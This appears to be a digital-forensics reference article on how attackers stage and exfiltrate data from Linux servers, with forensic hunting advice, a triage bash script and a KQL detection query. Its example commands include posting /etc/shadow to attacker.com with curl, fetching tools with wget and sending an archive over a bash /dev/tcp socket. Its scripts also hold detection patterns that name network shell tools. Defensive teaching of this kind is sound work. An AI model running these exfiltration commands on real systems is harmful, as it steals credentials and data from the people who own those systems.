Artifact Analysis: Linux Data Staging & Exfiltration

1. Data Staging: The Preparation Phase

Before exfiltrating hundreds of gigabytes of databases or source code, adversaries must aggregate and compress the data to reduce transfer time and evade basic Network Data Loss Prevention (DLP) signatures. This phase is known as “Staging”.

A. Archiving and Compression (`tar`, `zip`)

Attackers create massive archive files containing the target directories (/var/www/html, /home, database dumps).

Behavioral Artifact: tar -czvf /tmp/backup.tar.gz /var/www/html
Encryption: Advanced actors will encrypt the archive to blind network inspection: zip -r -e password /dev/shm/secret.zip /home/user
Forensic Hunting: Analysts must scan staging directories (/tmp, /var/tmp, /dev/shm) for unusually large files (.tar, .gz, .zip, .7z) or files with suspicious, random extensions.

B. Obfuscation (`base64`)

To bypass basic string-matching filters or to exfiltrate binary data over text-only channels (like DNS), attackers often encode sensitive files.

Behavioral Artifact: cat /etc/shadow | base64 > /tmp/shadow.b64

2. Ingress & Egress Vectors (LOLBAS Abuse)

Once the data is staged, or when the attacker needs to download secondary tools (Ingress), they rely on native networking binaries.

Web Clients (curl, wget)

The most common vectors. Ingress: wget http://attacker.com/linpeas.sh -O /tmp/check.sh Egress: Attackers can exfiltrate files directly via HTTP POST requests: curl -F "data=@/etc/shadow" http://attacker.com/upload.php

SSH Tooling (scp, rsync, sftp)

If the attacker controls a remote machine via SSH, they will use encrypted channels. This traffic is invisible to network proxies. Analysts must rely entirely on the Bash History or auth.log outbound connections to detect this.

The Stealth Vector: Bash `/dev/tcp`

If a server has been stripped of nc (netcat), curl, or wget for security reasons, attackers can use a built-in feature of the Bash shell to open network sockets directly.

The Attack: cat /tmp/secrets.tar.gz > /dev/tcp/198.51.100.45/4444
Forensic Challenge: This is a highly stealthy technique. It does not spawn a new child process (like running nc would), meaning it might bypass standard process monitoring. It is handled entirely internally by the existing bash process.

3. Advanced Exfiltration Techniques

If standard outbound ports are heavily filtered by the corporate firewall, adversaries adapt using alternative channels.

A. Cloud Synchronization (`rclone`)

In modern ransomware and extortion campaigns targeting Linux file servers, rclone has become the industry standard for attackers. They download the standalone binary into /tmp and configure it to sync the victim’s data directly to attacker-controlled cloud storage (Mega, Google Drive, AWS S3).

DFIR Action: Search for rclone configuration files (rclone.conf) or the orphaned binary in temporary directories.

B. WebRoot Hijacking

If the compromised machine is a web server, attackers often skip outbound connections entirely. They simply stage the data inside the web server’s public directory (e.g., mv /tmp/dump.sql /var/www/html/assets/logo.zip) and download it directly through their web browser via standard HTTP GET requests.

DFIR Action: Analyze the web server’s access.log for successful downloads (HTTP 200) of unusually large files or strange extensions from the webroot.

4. DFIR Triage & Hunting Queries

When analyzing a mounted forensic image (e.g., at /mnt/analysis/), apply the following triage methodology.

Bash (Offline Artifact Hunt)
KQL (Live Egress Hunting)

#!/bin/bash
TARGET_DIR="/mnt/analysis"

echo "[+] Hunting for large files (Potential Staging > 50MB) in temp dirs..."
find $TARGET_DIR/tmp $TARGET_DIR/var/tmp $TARGET_DIR/dev/shm -type f -size +50M -ls

echo "[+] Hunting for orphaned rclone or tunneling binaries..."
find $TARGET_DIR/tmp $TARGET_DIR/var/tmp -type f -name "rclone*" -o -name "ngrok*" -o -name "chisel*" -ls

echo "[+] Scanning bash history for exfiltration LOLBAS..."
grep -E "curl.*-F|wget.*--post-file|/dev/tcp/|tar.*-czvf|base64" $TARGET_DIR/home/*/.bash_history $TARGET_DIR/root/.bash_history

// Detects LOLBAS utilities making anomalous outbound connections
// and transferring large amounts of data (Potential Exfiltration)
DeviceNetworkEvents
| where InitiatingProcessFileName in~ ("curl", "wget", "nc", "netcat", "bash", "rclone", "rsync")
// Filter for external, non-private IP addresses
| where RemoteIPType == "Public"
// Optional: Join with File Events to see if a staging file was created right before the connection
| project TimeGenerated, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteIP, RemotePort
| sort by TimeGenerated desc

References & Further Reading

LOLBAS Project: Living Off The Land Binaries and Scripts
MITRE ATT&CK: Exfiltration Over Web Service (T1567)
Related Artifact: Linux Shell History (.bash_history)
Related Artifact: Linux Filesystem Analysis (MAC Times)